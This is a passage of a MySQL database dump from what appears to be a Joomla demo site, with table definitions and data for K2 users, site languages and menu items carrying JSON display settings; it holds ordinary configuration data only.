) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_user_groups`
--

LOCK TABLES `xyhmu_k2_user_groups` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_user_groups` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_k2_user_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_k2_users`
--

DROP TABLE IF EXISTS `xyhmu_k2_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_k2_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `userID` int(11) NOT NULL,
  `userName` varchar(255) DEFAULT NULL,
  `gender` enum('m','f') NOT NULL DEFAULT 'm',
  `description` text NOT NULL,
  `image` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `group` int(11) NOT NULL DEFAULT '0',
  `plugins` text NOT NULL,
  `ip` varchar(15) NOT NULL,
  `hostname` varchar(255) NOT NULL,
  `notes` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `userID` (`userID`),
  KEY `group` (`group`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_k2_users`
--

LOCK TABLES `xyhmu_k2_users` WRITE;
/*!40000 ALTER TABLE `xyhmu_k2_users` DISABLE KEYS */;
INSERT INTO `xyhmu_k2_users` VALUES (1,135,'Super User','m','<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliq Ut enim ad minim veniam, quis nostrud exercitation ullamco nisi.</p>','1.jpg','http://www.joomshaper.com',1,'','192.168.1.98','192.168.1.98','');
/*!40000 ALTER TABLE `xyhmu_k2_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_languages`
--

DROP TABLE IF EXISTS `xyhmu_languages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_languages` (
  `lang_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `lang_code` char(7) NOT NULL,
  `title` varchar(50) NOT NULL,
  `title_native` varchar(50) NOT NULL,
  `sef` varchar(50) NOT NULL,
  `image` varchar(50) NOT NULL,
  `description` varchar(512) NOT NULL,
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `sitename` varchar(1024) NOT NULL DEFAULT '',
  `published` int(11) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`lang_id`),
  UNIQUE KEY `idx_sef` (`sef`),
  UNIQUE KEY `idx_image` (`image`),
  UNIQUE KEY `idx_langcode` (`lang_code`),
  KEY `idx_access` (`access`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_languages`
--

LOCK TABLES `xyhmu_languages` WRITE;
/*!40000 ALTER TABLE `xyhmu_languages` DISABLE KEYS */;
INSERT INTO `xyhmu_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','','',1,0,1),(2,'lt-LT','LithuanianLt','LithuanianLt','lt','lt','','','','',1,1,0);
/*!40000 ALTER TABLE `xyhmu_languages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_menu`
--

DROP TABLE IF EXISTS `xyhmu_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_menu` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
  `title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.',
  `alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
  `note` varchar(255) NOT NULL DEFAULT '',
  `path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
  `link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.',
  `type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
  `published` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.',
  `parent_id` int(10) unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.',
  `level` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.',
  `component_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id',
  `ordering` int(11) NOT NULL DEFAULT '0' COMMENT 'The relative ordering of the menu item in the tree.',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id',
  `checked_out_time` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
  `browserNav` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.',
  `access` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The access level required to view the menu item.',
  `img` varchar(255) NOT NULL COMMENT 'The image of the menu item.',
  `template_style_id` int(10) unsigned NOT NULL DEFAULT '0',
  `params` text NOT NULL COMMENT 'JSON encoded data for the menu item.',
  `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `home` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.',
  `language` char(7) NOT NULL DEFAULT '',
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`,`language`),
  KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
  KEY `idx_menutype` (`menutype`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_alias` (`alias`),
  KEY `idx_path` (`path`(333)),
  KEY `idx_language` (`language`)
) ENGINE=MyISAM AUTO_INCREMENT=339 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_menu`
--

LOCK TABLES `xyhmu_menu` WRITE;
/*!40000 ALTER TABLE `xyhmu_menu` DISABLE KEYS */;
INSERT INTO `xyhmu_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,351,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',1,10,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',2,3,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',4,5,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',6,7,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',8,9,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',273,278,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',274,275,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',276,277,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',279,284,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',280,281,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',282,283,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',285,290,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',286,287,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',288,289,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',303,304,0,'*',1),(17,'menu','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',0,1,1,19,0,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',293,294,0,'*',1),(18,'menu','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',295,300,0,'*',1),(19,'menu','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',296,297,0,'*',1),(20,'menu','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',298,299,0,'*',1),(21,'menu','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',291,292,0,'*',1),(22,'menu','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',0,1,1,28,0,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',301,302,0,'*',1),(101,'mainmenu','Naujienos','home','','home','index.php?option=com_content&view=featured','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"44\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"12\",\"num_columns\":\"3\",\"num_links\":\"\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"order\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"\",\"show_readmore_title\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"3\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"730\",\"colxw\":\"230\\r\\n230\\r\\n270\",\"class\":\"\",\"subcontent\":\"normal\"}',11,50,1,'*',0),(102,'mainmenu','Features','features','','features','#','url',-2,1,1,27,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"3\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"500\",\"colxw\":\"250\\r\\n250\\r\\n500\",\"class\":\"\",\"subcontent\":\"normal\"}',173,212,0,'*',0),(103,'mainmenu','Typography','typgraphy','','features/key-features/typgraphy','index.php?option=com_content&view=article&id=14','component',-2,106,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',175,176,0,'*',0),(104,'mainmenu','Module Position','module-position','','features/key-features/module-position','index.php?option=com_content&view=article&id=18','component',-2,106,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',177,178,0,'*',0),(105,'mainmenu','Module Variations','module-variations','','features/key-features/module-variations','index.php?option=com_content&view=article&id=2','component',-2,106,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\" \",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',179,180,0,'*',0),(106,'mainmenu','Key Features','key-features','','features/key-features','#','url',-2,102,2,27,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',174,187,0,'*',0),(107,'mainmenu','Shortcode','shortcode','','shortcode','#','url',-2,1,1,27,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\" hidden-tablet\",\"subcontent\":\"normal\"}',147,170,0,'*',0),(108,'mainmenu','Menu','2013-01-31-07-00-49','','features/2013-01-31-07-00-49','#','url',-2,102,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',188,209,0,'*',0),(109,'mainmenu','Mega Menu','2013-01-31-07-04-54','','features/2013-01-31-07-00-49/2013-01-31-07-04-54','?menu=mega','url',-2,108,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',189,190,0,'*',0),(110,'mainmenu','Dropline Menu','2013-01-31-07-06-22','','features/2013-01-31-07-00-49/2013-01-31-07-06-22','?menu=drop','url',-2,108,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',191,192,0,'*',0),(112,'mainmenu','Split Menu','2013-01-31-07-08-55','','features/2013-01-31-07-00-49/2013-01-31-07-08-55','?menu=split','url',-2,108,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',193,194,0,'*',0),(113,'mainmenu','RTL Demos','2013-01-31-07-09-06','','features/key-features/2013-01-31-07-09-06','#','url',-2,106,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',181,186,0,'*',0),(114,'mainmenu','LTR Language','2013-01-31-07-09-56','','features/key-features/2013-01-31-07-09-06/2013-01-31-07-09-56','?direction=ltr','url',-2,113,4,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',182,183,0,'*',0),(115,'mainmenu','RTL Language','2013-01-31-07-10-29','','features/key-features/2013-01-31-07-09-06/2013-01-31-07-10-29','?direction=rtl','url',-2,113,4,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',184,185,0,'*',0),(116,'mainmenu','Custom Module','2013-01-31-07-13-54','','features/2013-01-31-07-13-54','#','url',-2,102,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"1\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"modules\",\"mods\":[\"87\"]}',210,211,0,'*',0),(117,'mainmenu','Presets','2013-01-31-07-20-51','','2013-01-31-07-20-51','#','url',-2,1,1,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',213,226,0,'*',0),(118,'mainmenu','Preset1','2013-01-31-07-21-59','','2013-01-31-07-20-51/2013-01-31-07-21-59','?preset=preset1','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',214,215,0,'*',0),(120,'mainmenu','Preset2','2013-01-31-07-24-34','','2013-01-31-07-20-51/2013-01-31-07-24-34','?preset=preset2','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',216,217,0,'*',0),(121,'mainmenu','Preset3','2013-01-31-07-25-04','','2013-01-31-07-20-51/2013-01-31-07-25-04','?preset=preset3','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',218,219,0,'*',0),(123,'mainmenu','Joomla!','joomla','','features/2013-01-31-07-00-49/joomla','index.php?option=com_content&view=article&id=1','component',-2,108,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',195,208,0,'*',0),(133,'mainmenu','Single Article','single-article','','features/2013-01-31-07-00-49/joomla/single-article','index.php?option=com_content&view=article&id=1','component',-2,123,4,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',198,199,0,'*',0),(132,'mainmenu','Category Blog','category-blog','','features/2013-01-31-07-00-49/joomla/category-blog','index.php?option=com_content&view=category&layout=blog&id=8','component',-2,123,4,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',196,197,0,'*',0),(139,'mainmenu','Contact','contact','','features/2013-01-31-07-00-49/joomla/contact','index.php?option=com_contact&view=contact&id=1','component',-2,123,4,8,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_